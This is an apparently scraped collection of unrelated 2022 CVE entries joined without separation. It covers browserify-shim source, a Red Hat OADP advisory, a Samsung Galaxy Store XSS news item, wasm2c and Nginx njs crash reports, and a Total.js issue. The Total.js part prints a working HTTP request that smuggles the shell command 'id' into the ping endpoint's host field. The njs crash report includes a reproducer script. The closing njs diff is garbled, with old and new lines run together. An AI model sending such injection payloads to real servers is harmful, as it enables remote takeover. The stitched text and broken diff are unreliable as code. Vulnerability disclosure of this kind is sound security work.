Prototype pollution vulnerability in function resolveShims in resolve-shims.js in thlorenz browserify-shim 3.8.15 via the shimPath variable in resolve-shims.js.

'use strict'; var path \= require('path') , fs \= require('fs') , util \= require('util') , parseInlineShims \= require('./parse-inline-shims') , mothership \= require('mothership') , format \= require('util').format var shimsCache \= {} , shimsByPath \= {}; function inspect(obj, depth) { return util.inspect(obj, false, depth || 5, true); } function isPath(s) { return (/^\[.\]{0,2}\[/\\\\\]/).test(s); } function validate(key, config, dir) { var msg , details \= 'When evaluating shim "' + key + '": ' + inspect(config) + '\\ninside ' + dir + '\\n'; if (!config.hasOwnProperty('exports')) { msg \= 'browserify-shim needs at least a path and exports to do its job, you are missing the exports. ' + '\\nIf this module has no exports, specify exports as null.' throw new Error(details + msg); } } function updateCache(packageDir, pack, resolvedShims, exposeGlobals) { shimsCache\[packageDir\] \= { pack: pack, shims: resolvedShims, exposeGlobals: exposeGlobals }; Object.keys(resolvedShims).forEach(function(fullPath) { var shim \= resolvedShims\[fullPath\]; validate(fullPath, shim, packageDir); shimsByPath\[fullPath\] \= shim; }); } function resolveDependsRelativeTo(dir, browser, depends, packDeps, messages) { var resolved; if (!depends) return undefined; return Object.keys(depends).reduce(function (acc, k) { if (browser\[k\]){ acc\[k\] \= depends\[k\]; messages.push(format('Found depends "%s" exposed in browser field', k)); } else if (!isPath(k)) { acc\[k\] \= depends\[k\]; if (packDeps\[k\]) { messages.push(format('Found depends "%s" as an installed dependency of the package', k)); } else { messages.push(format('WARNING, depends "%s" is not a path, nor is it exposed in the browser field, nor was it found in package dependencies.', k)); } } else { // otherwise resolve the path resolved \= path.resolve(dir, k); acc\[resolved\] \= depends\[k\]; messages.push(format('Depends "%s" was resolved to be at \[%s\]', k, resolved)); } return acc; }, {}) } function resolvePaths (packageDir, shimFileDir, browser, shims, packDeps, messages) { return Object.keys(shims) .reduce(function (acc, relPath) { var shim \= shims\[relPath\]; var exposed \= browser\[relPath\]; var shimPath; if (exposed) { // lib exposed under different name/path in package.json's browser field // and it is referred to by this alias in the shims (either external or in package.json) // i.e.: 'non-cjs': { ... } -> browser: { 'non-cjs': './vendor/non-cjs.js } shimPath \= path.resolve(packageDir, exposed); messages.push(format('Found "%s" in browser field referencing "%s" and resolved it to "%s"', relPath, exposed, shimPath)); } else if (shimFileDir) { // specified via relative path to shim file inside shim file // i.e. './vendor/non-cjs': { exports: .. } shimPath \= path.resolve(shimFileDir, relPath); messages.push(format('Resolved "%s" found in shim file to "%s"', relPath, shimPath)); } else { // specified via relative path in package.json browserify-shim config // i.e. 'browserify-shim': { './vendor/non-cjs': 'noncjs' } shimPath \= path.resolve(packageDir, relPath); messages.push(format('Resolved "%s" found in package.json to "%s"', relPath, shimPath)); } var depends \= resolveDependsRelativeTo(shimFileDir || packageDir, browser, shim.depends, packDeps, messages); acc\[shimPath\] \= { exports: shim.exports, depends: depends }; return acc; }, {}); } function mapifyExposeGlobals(exposeGlobals) { return Object.keys(exposeGlobals) .reduce(function (acc, k) { var val \= exposeGlobals\[k\]; var parts \= val.split(':'); if (parts.length < 2 || !parts\[1\].length) { throw new Error( 'Expose Globals need to have the format "global:expression.\\n"' + inspect({ key: k, value: val }) + 'does not.' ); } // this also handle unlikely cases of 'global:\_.someFunc(':')' with a \`:\` in the actual global expression parts.shift(); acc\[k\] \= parts.join(':'); return acc; }, {}); } function separateExposeGlobals(shims) { var onlyShims \= {} , exposeGlobals \= {}; Object.keys(shims).forEach(function (k) { var val \= shims\[k\] , exp \= val && val.exports; if (exp && /^global\\:/.test(exp)) { exposeGlobals\[k\] \= exp; } else { onlyShims\[k\] \= val; } }); return { shims: onlyShims, exposeGlobals: mapifyExposeGlobals(exposeGlobals) }; } function resolveFromShimFile(packageDir, pack, shimField, messages) { var shimFile \= path.join(packageDir, shimField) , shimFileDir \= path.dirname(shimFile); var allShims \= require(shimFile); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, shimFileDir, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } function resolveInlineShims(packageDir, pack, shimField, messages) { var allShims \= parseInlineShims(shimField); var separated \= separateExposeGlobals(allShims); var resolvedShims \= resolvePaths(packageDir, null, pack.browser || {}, separated.shims, pack.dependencies || {}, messages); return { shims: resolvedShims, exposeGlobals: separated.exposeGlobals }; } var resolve \= module.exports \= function resolveShims (file, messages, cb) { // find the package.json that defines browserify-shim config for this file mothership(file, function (pack) { return !! pack\['browserify-shim'\] }, function (err, res) { if (err) return cb(err); if (!res || !res.pack) return cb(new Error('Unable to find a browserify-shim config section in the package.json for ' + file)); var pack \= res.pack; var packFile \= res.path; var packageDir \= path.dirname(packFile); // we cached this before which means it was also grouped by file var cached \= shimsCache\[packageDir\]; // if it was cached, that means any package fixes were applied as well if (cached) { return cb(null, { package\_json : packFile , packageDir : packageDir , resolvedPreviously : true , shim : shimsByPath\[file\] , exposeGlobals : cached.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } try { pack \= require(packFile); var shimField \= pack\['browserify-shim'\]; if (!shimField) return cb(null, { package\_json: packFile, shim: undefined }); var resolved \= typeof shimField \=== 'string' ? resolveFromShimFile(packageDir, pack, shimField, messages) : resolveInlineShims(packageDir, pack, shimField, messages); messages.push({ resolved: resolved.shims }); updateCache(packageDir, pack, resolved.shims, resolved.exposeGlobals); cb(null, { package\_json : packFile , packageDir : packageDir , shim : shimsByPath\[file\] , exposeGlobals : resolved.exposeGlobals , browser : pack.browser , 'browserify-shim' : pack\['browserify-shim'\] , dependencies : pack.dependencies }); } catch (err) { console.trace(); return cb(err); } }); }

CVE-2022-37623: browserify-shim/resolve-shims.js at 464b32bbe142664cd9796059798f6c738ea3de8f · thlorenz/browserify-shim

A Regular Expression Denial of Service (ReDoS) flaw was found in kangax html-minifier 4.0.0 via the candidate variable in htmlminifier.js.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-37620: CVE-2022-37620/ ReDoS found in htmlminifier.js · Issue #1135 · kangax/html-minifier

OpenShift API for Data Protection (OADP) 1.0.5 is now available.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-21698: prometheus/client_golang: Denial of service using InstrumentHandlerCounter


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-10-31

Updated:

2022-10-31

**RHSA-2022:7261 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: OpenShift API for Data Protection (OADP) 1.0.5 security and bug fix update

**Type/Severity**

Security Advisory: Moderate

**Topic**

OpenShift API for Data Protection (OADP) 1.0.5 is now available.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.  

Security Fix(es):  

*   prometheus/client\_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   OpenShift API for Data Protection 1 x86\_64

**Fixes**

*   BZ - 2045880 - CVE-2022-21698 prometheus/client\_golang: Denial of service using InstrumentHandlerCounter
*   OADP-801 - Openshift plugin does not add Migration Plan labels on all resources
*   OADP-812 - openshift-adp-controller-manager should not continuously log once dpa reaches reconciled
*   OADP-829 - Registry pod going in crashloopbackoff state
*   OADP-823 - Check OADP and Openshift Versions and warn / error on compatibility

**OpenShift API for Data Protection 1**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:7261: Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.0.5 security and bug fix update

A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones.
The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue

A now-patched security flaw has been disclosed in the Galaxy Store app for Samsung devices that could potentially trigger remote command execution on affected phones.

The vulnerability, which affects Galaxy Store version 4.5.32.4, relates to a cross-site scripting (XSS) bug that occurs when handling certain deep links. An independent security researcher has been credited with reporting the issue.

"Here, by not checking the deep link securely, when a user accesses a link from a website containing the deeplink, the attacker can execute JS code in the webview context of the Galaxy Store application," SSD Secure Disclosure said in an advisory posted last week.

XSS attacks allow an adversary to inject and execute malicious JavaScript code when visiting a website from a browser or another application.

The issue identified in the Galaxy Store app has to do with how deep links are configured for Samsung's Marketing & Content Service (MCS), potentially leading to a scenario where arbitrary code injected into the MCS website could lead to its execution.

This could then be leveraged to download and install malware-laced apps on the Samsung device when visiting the link.

"To be able to successfully exploit the victim's server, it is necessary to have HTTPS and CORS bypass of chrome," the researchers noted.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Samsung Galaxy Store Bug Could've Let Hackers Secretly Install Apps on Targeted Devices

In Total.js 4 before 0e5ace7, /api/common/ping can achieve remote command execution via shell metacharacters in the host parameter.

Using the API /api/common/ping it's possible to achieve remote command execution on the host machine. This leads to complete control over the machine hosting the server.

    POST /api/common/ping HTTP/1.1
    Host: 0.0.0.0:8000
    User-Agent: bla-bla-bla
    Cookie: your-auth-cookie
    Content-Length: 15
    
    host=1.1.1.1;id
    

	schema.addWorkflow('ping', function($) {
		var host \= $.model.host.replace(/'|"|\\n/g, '');
		Exec('ping -c 3 {0}'.format(host), $.done(true));
	});

Here the problem is the fact that the server doesn't sanitize correctly the input checking that the host provided is a legitimate one, allowing also characters like ;, | or &.

CVE-2022-44019: [Security] Remote command execution · Issue #12 · totaljs/code

An issue has been discovered in GitLab affecting all versions starting from 10.0 before 12.9.8, all versions starting from 12.10 before 12.10.7, all versions starting from 13.0 before 13.0.1. TODO

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Sign up now
*   Login
*   Sign in / Register
    

*   GitLab.org
*   cves
*   Repository

Switch branch/tag

*   cves
*   2022
*   **CVE-2022-2826.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · 5bf91700
    
    🤖 GitLab Bot 🤖 authored Oct 28, 2022
    
    5bf91700

CVE-2022-2826: 2022/CVE-2022-2826.json · master · GitLab.org / cves · GitLab

wasm2c v1.0.29 was discovered to contain an abort in CWriter::Write.

**Environment**

    OS      : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 3054d61f703d609995798f872fc86b462617c294
    Version : 1.0.29
    Build   : make clang-debug-asan
    

**Proof of concept**

poc\_wasm2c-1.wasm  
poc\_wasm2c-1.wasm.zip

**Stack dump**

    gdb /wabt/out/clang/Debug/asan/wasm2c
    pwndbg> r  --enable-multi-memory ./poc_wasm2c-1.wasm
    context:
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ─────────────────────────────────[ REGISTERS ]──────────────────────────────────
     RAX  0x0
    *RBX  0x7ffff7a357c0 ◂— 0x7ffff7a357c0
    *RCX  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
     RDX  0x0
    *RDI  0x2
    *RSI  0x7fffffff6990 ◂— 0x0
     R8   0x0
    *R9   0x7fffffff6990 ◂— 0x0
    *R10  0x8
    *R11  0x246
    *R12  0x43e420 (_start) ◂— endbr64
    *R13  0x7fffffffe070 ◂— 0x3
     R14  0x0
     R15  0x0
    *RBP  0x7fffffff88f0 —▸ 0x7fffffff8930 —▸ 0x7fffffffa650 —▸ 0x7fffffffa690 —▸ 0x7fffffffc3c0 ◂— ...
    *RSP  0x7fffffff6990 ◂— 0x0
    *RIP  0x7ffff7a7b00b (raise+203) —▸ 0x10824848b48 ◂— 0x0
    ───────────────────────────────────[ DISASM ]───────────────────────────────────
     ► 0x7ffff7a7b00b <raise+203>    mov    rax, qword ptr [rsp + 0x108]
       0x7ffff7a7b013 <raise+211>    xor    rax, qword ptr fs:[0x28]
       0x7ffff7a7b01c <raise+220>    jne    raise+260                <raise+260>
        ↓
       0x7ffff7a7b044 <raise+260>    call   __stack_chk_fail                <__stack_chk_fail>
    
       0x7ffff7a7b049                nop    dword ptr [rax]
       0x7ffff7a7b050 <killpg>       endbr64
       0x7ffff7a7b054 <killpg+4>     test   edi, edi
       0x7ffff7a7b056 <killpg+6>     js     killpg+16                <killpg+16>
    
       0x7ffff7a7b058 <killpg+8>     neg    edi
       0x7ffff7a7b05a <killpg+10>    jmp    kill                <kill>
    
       0x7ffff7a7b05f <killpg+15>    nop
    ───────────────────────────────────[ STACK ]────────────────────────────────────
    00:0000│ rsi r9 rsp 0x7fffffff6990 ◂— 0x0
    01:0008│            0x7fffffff6998 ◂— '(ut)(x))unimplemented: %'
    02:0010│            0x7fffffff69a0 ◂— 'unimplemented: %'
    03:0018│            0x7fffffff69a8 ◂— 'ented: %'
    04:0020│            0x7fffffff69b0 ◂— 0x0
    ... ↓               3 skipped
    ─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
     ► f 0   0x7ffff7a7b00b raise+203
       f 1   0x7ffff7a5a859 abort+299
       f 2         0x52769e
       f 3         0x5315c3
       f 4         0x52760d
       f 5         0x5315c3
       f 6         0x52760d
       f 7         0x51dd51
    ────────────────────────────────────────────────────────────────────────────────
    
    backtrace_msg:
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7a5a859 in __GI_abort () at abort.c:79
    #2  0x000000000052769e in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1969
    #3  0x00000000005315c3 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::intrusive_list<wabt::Expr> const&> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:205
    #4  0x000000000052760d in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1945
    #5  0x00000000005315c3 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::intrusive_list<wabt::Expr> const&> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:205
    #6  0x000000000052760d in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, exprs=...) at ../../../../src/c-writer.cc:1945
    #7  0x000000000051dd51 in wabt::(anonymous namespace)::CWriter::Write<wabt::intrusive_list<wabt::Expr> const&, wabt::(anonymous namespace)::LabelDecl> (this=0x7fffffffce30, t=..., u=...) at ../../../../src/c-writer.cc:204
    #8  0x000000000051bd15 in wabt::(anonymous namespace)::CWriter::Write (this=0x7fffffffce30, func=...) at ../../../../src/c-writer.cc:1423
    #9  0x000000000051b647 in wabt::(anonymous namespace)::CWriter::Write<wabt::(anonymous namespace)::Newline, wabt::Func const&, wabt::(anonymous namespace)::Newline> (this=0x7fffffffce30, t=..., u=..., args=...) at ../../../../src/c-writer.cc:205
    #10 0x000000000051182d in wabt::(anonymous namespace)::CWriter::WriteFuncs (this=0x7fffffffce30) at ../../../../src/c-writer.cc:1393
    #11 0x0000000000500bf4 in wabt::(anonymous namespace)::CWriter::WriteCSource (this=0x7fffffffce30) at ../../../../src/c-writer.cc:2794
    #12 0x00000000004ffcd7 in wabt::(anonymous namespace)::CWriter::WriteModule (this=0x7fffffffce30, module=...) at ../../../../src/c-writer.cc:2807
    #13 0x00000000004ff48d in wabt::WriteC (c_stream=0x7fffffffdaa0, h_stream=0x7fffffffdaa0, header_name=0x7ccce0 <str> "wasm.h", module=0x7fffffffd2b0, options=...) at ../../../../src/c-writer.cc:2819
    #14 0x00000000004f11b4 in ProgramMain (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:179
    #15 0x00000000004f37f2 in main (argc=3, argv=0x7fffffffe078) at ../../../../src/tools/wasm2c.cc:190
    #16 0x00007ffff7a5c083 in __libc_start_main (main=0x4f37d0 <main(int, char**)>, argc=3, argv=0x7fffffffe078, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe068) at ../csu/libc-start.c:308
    #17 0x000000000043e44e in _start ()

CVE-2022-43283: Aborted in CWriter::Write at wasm2c  · Issue #1985 · WebAssembly/wabt

Nginx NJS v0.7.2 to v0.7.4 was discovered to contain a segmentation violation via njs_scope_valid_value at njs_scope.h.

    OS      : Linux ubuntu 5.13.0-27-generic #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    Commit  : 7bd570b39297d3d91902c93a624c89b08be7a6fe
    Version : 0.7.2
    Build   : 
              NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
              NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
    

    function main() {
    function a0(a1,a2) {
        a0 = a1;
    }
    a0();
    a0();
    }
    main();
    

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2064564==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004e36b5 bp 0x7ffd26e5c130 sp 0x7ffd26e5b920 T0)
    ==2064564==The signal is caused by a READ memory access.
    ==2064564==Hint: address points to the zero page.
        #0 0x4e36b5 in njs_scope_valid_value /home/q1iq/Documents/origin/njs/src/njs_scope.h:85:10
        #1 0x4e36b5 in njs_vmcode_function_copy /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:1223:14
        #2 0x4e36b5 in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:727:23
        #3 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
        #4 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
        #5 0x53b43a in njs_function_lambda_call /home/q1iq/Documents/origin/njs/src/njs_function.c:703:11
        #6 0x4e47fa in njs_vmcode_interpreter /home/q1iq/Documents/origin/njs/src/njs_vmcode.c:785:23
        #7 0x4deb7b in njs_vm_start /home/q1iq/Documents/origin/njs/src/njs_vm.c:493:11
        #8 0x4c8099 in njs_process_script /home/q1iq/Documents/origin/njs/src/njs_shell.c:903:19
        #9 0x4c7484 in njs_process_file /home/q1iq/Documents/origin/njs/src/njs_shell.c:632:11
        #10 0x4c7484 in main /home/q1iq/Documents/origin/njs/src/njs_shell.c:316:15
        #11 0x7f135ab960b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #12 0x41dabd in _start (/home/q1iq/Documents/origin/njs/build/njs+0x41dabd)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/q1iq/Documents/origin/njs/src/njs_scope.h:85:10 in njs_scope_valid_value
    ==2064564==ABORTING

CVE-2022-43284: SEGV njs_scope.h:85:10 in njs_scope_valid_value · Issue #470 · nginx/njs

Nginx NJS v0.7.2 was discovered to contain a heap-use-after-free bug caused by illegal memory copy in the function njs_json_parse_iterator_call at njs_json.c.

@@ -28,27 +28,17 @@ typedef struct { int64\_t length; njs\_array\_t \*keys; njs\_value\_t \*key; njs\_object\_prop\_t \*prop; njs\_value\_t prop; } njs\_json\_state\_t;  
  
typedef struct { njs\_value\_t retval;  
njs\_uint\_t depth; #define NJS\_JSON\_MAX\_DEPTH 32 njs\_json\_state\_t states\[NJS\_JSON\_MAX\_DEPTH\];  
njs\_function\_t \*function; } njs\_json\_parse\_t;  
  
typedef struct { njs\_value\_t retval;  
njs\_vm\_t \*vm;  
njs\_uint\_t depth; #define NJS\_JSON\_MAX\_DEPTH 32 njs\_json\_state\_t states\[NJS\_JSON\_MAX\_DEPTH\];  
njs\_value\_t replacer; @@ -72,10 +62,9 @@ njs\_inline uint32\_t njs\_json\_unicode(const u\_char \*p); static const u\_char \*njs\_json\_skip\_space(const u\_char \*start, const u\_char \*end);  
static njs\_int\_t njs\_json\_parse\_iterator(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*value); static njs\_int\_t njs\_json\_parse\_iterator\_call(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_json\_state\_t \*state); static njs\_int\_t njs\_json\_internalize\_property(njs\_vm\_t \*vm, njs\_function\_t \*reviver, njs\_value\_t \*holder, njs\_value\_t \*name, njs\_int\_t depth, njs\_value\_t \*retval); static void njs\_json\_parse\_exception(njs\_json\_parse\_ctx\_t \*ctx, const char \*msg, const u\_char \*pos);  
@@ -108,15 +97,13 @@ njs\_json\_parse(njs\_vm\_t \*vm, njs\_value\_t \*args, njs\_uint\_t nargs, njs\_index\_t unused) { njs\_int\_t ret; njs\_value\_t \*text, value, lvalue; njs\_value\_t \*text, value, lvalue, wrapper; njs\_object\_t \*obj; const u\_char \*p, \*end; njs\_json\_parse\_t \*parse, json\_parse; const njs\_value\_t \*reviver; njs\_string\_prop\_t string; njs\_json\_parse\_ctx\_t ctx;  
parse = &json\_parse;  
text = njs\_lvalue\_arg(&lvalue, args, nargs, 1);  
if (njs\_slow\_path(!njs\_is\_string(text))) { @@ -156,11 +143,16 @@ njs\_json\_parse(njs\_vm\_t \*vm, njs\_value\_t \*args, njs\_uint\_t nargs,  
reviver = njs\_arg(args, nargs, 2);  
if (njs\_slow\_path(njs\_is\_function(reviver) && njs\_is\_object(&value))) { parse->function = njs\_function(reviver); parse->depth = 0; if (njs\_slow\_path(njs\_is\_function(reviver))) { obj = njs\_json\_wrap\_value(vm, &wrapper, &value); if (njs\_slow\_path(obj == NULL)) { return NJS\_ERROR; }  
return njs\_json\_parse\_iterator(vm, parse, &value); return njs\_json\_internalize\_property(vm, njs\_function(reviver), &wrapper, njs\_value\_arg(&njs\_string\_empty), 0, &vm->retval); }  
vm->retval = value; @@ -851,195 +843,106 @@ njs\_json\_skip\_space(const u\_char \*start, const u\_char \*end) }  
  
static njs\_json\_state\_t \* njs\_json\_push\_parse\_state(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*value) { njs\_json\_state\_t \*state;  
if (njs\_slow\_path(parse->depth >= NJS\_JSON\_MAX\_DEPTH)) { njs\_type\_error(vm, "Nested too deep or a cyclic structure"); return NULL; }  
state = &parse->states\[parse->depth++\]; state->value = \*value; state->index = 0; state->prop = NULL; state->keys = njs\_value\_own\_enumerate(vm, value, NJS\_ENUM\_KEYS, NJS\_ENUM\_STRING, 0); if (state->keys == NULL) { return NULL; }  
return state; }  
  
njs\_inline njs\_json\_state\_t \* njs\_json\_pop\_parse\_state(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse) { njs\_json\_state\_t \*state;  
state = &parse->states\[parse->depth - 1\]; njs\_array\_destroy(vm, state->keys); state->keys = NULL;  
if (parse->depth > 1) { parse->depth\--; return &parse->states\[parse->depth - 1\]; }  
return NULL; }  
  
static njs\_int\_t njs\_json\_parse\_iterator(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_value\_t \*object) njs\_json\_internalize\_property(njs\_vm\_t \*vm, njs\_function\_t \*reviver, njs\_value\_t \*holder, njs\_value\_t \*name, njs\_int\_t depth, njs\_value\_t \*retval) { njs\_int\_t ret; njs\_value\_t \*key, wrapper; njs\_object\_t \*obj; njs\_json\_state\_t \*state; njs\_object\_prop\_t \*prop; njs\_property\_query\_t pq; int64\_t k, length; njs\_int\_t ret; njs\_value\_t val, new\_elem, index; njs\_value\_t arguments\[3\]; njs\_array\_t \*keys;  
obj = njs\_json\_wrap\_value(vm, &wrapper, object); if (njs\_slow\_path(obj == NULL)) { if (njs\_slow\_path(depth++ >= NJS\_JSON\_MAX\_DEPTH)) { njs\_type\_error(vm, "Nested too deep or a cyclic structure"); return NJS\_ERROR; }  
state = njs\_json\_push\_parse\_state(vm, parse, &wrapper); if (njs\_slow\_path(state == NULL)) { ret = njs\_value\_property(vm, holder, name, &val); if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; }  
for ( ;; ) { if (state->index < state->keys\->length) { njs\_property\_query\_init(&pq, NJS\_PROPERTY\_QUERY\_SET, 0);  
key = &state->keys\->start\[state->index\];  
ret = njs\_property\_query(vm, &pq, &state->value, key); if (njs\_slow\_path(ret != NJS\_OK)) { if (ret == NJS\_DECLINED) { state->index++; continue; } keys = NULL;  
if (njs\_is\_object(&val)) { if (!njs\_is\_array(&val)) { keys = njs\_array\_keys(vm, &val, 0); if (njs\_slow\_path(keys == NULL)) { return NJS\_ERROR; }  
prop = pq.lhq.value;  
if (prop->type == NJS\_WHITEOUT) { state->index++; continue; }  
state->prop = prop; for (k = 0; k < keys->length; k++) { ret = njs\_json\_internalize\_property(vm, reviver, &val, &keys->start\[k\], depth, &new\_elem);  
if (prop->type == NJS\_PROPERTY && njs\_is\_object(&prop->value)) { state = njs\_json\_push\_parse\_state(vm, parse, &prop->value); if (state == NULL) { return NJS\_ERROR; if (njs\_slow\_path(ret != NJS\_OK)) { goto done; }  
continue; } if (njs\_is\_undefined(&new\_elem)) { ret = njs\_value\_property\_delete(vm, &val, &keys->start\[k\], NULL, 0);  
if (prop->type == NJS\_PROPERTY\_REF && njs\_is\_object(prop->value.data.u.value)) { state = njs\_json\_push\_parse\_state(vm, parse, prop->value.data.u.value); if (state == NULL) { return NJS\_ERROR; } else { ret = njs\_value\_property\_set(vm, &val, &keys->start\[k\], &new\_elem); }  
continue; if (njs\_slow\_path(ret == NJS\_ERROR)) { goto done; } }  
} else { state = njs\_json\_pop\_parse\_state(vm, parse); if (state == NULL) { vm->retval = parse->retval; return NJS\_OK; } }  
ret = njs\_json\_parse\_iterator\_call(vm, parse, state); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; } } }  
  
static njs\_int\_t njs\_json\_parse\_iterator\_call(njs\_vm\_t \*vm, njs\_json\_parse\_t \*parse, njs\_json\_state\_t \*state) { njs\_int\_t ret; njs\_value\_t arguments\[3\], \*value; njs\_object\_prop\_t \*prop;  
prop = state->prop;  
arguments\[0\] = state->value; arguments\[1\] = state->keys\->start\[state->index++\];  
switch (prop->type) { case NJS\_PROPERTY: arguments\[2\] = prop->value; ret = njs\_object\_length(vm, &val, &length); if (njs\_slow\_path(ret == NJS\_ERROR)) { return NJS\_ERROR; }  
ret = njs\_function\_apply(vm, parse->function, arguments, 3, &parse->retval); if (njs\_slow\_path(ret != NJS\_OK)) { return ret; } for (k = 0; k < length; k++) { ret = njs\_int64\_to\_string(vm, &index, k); if (njs\_slow\_path(ret != NJS\_OK)) { return NJS\_ERROR; }  
if (njs\_is\_undefined(&parse->retval)) { prop->type = NJS\_WHITEOUT; ret = njs\_json\_internalize\_property(vm, reviver, &val, &index, depth, &new\_elem);  
} else { prop->value = parse->retval; } if (njs\_slow\_path(ret != NJS\_OK)) { return NJS\_ERROR; }  
break; if (njs\_is\_undefined(&new\_elem)) { ret = njs\_value\_property\_delete(vm, &val, &index, NULL, 0);  
case NJS\_PROPERTY\_REF: value = prop->value.data.u.value; arguments\[2\] = \*value; } else { ret = njs\_value\_property\_set(vm, &val, &index, &new\_elem); }  
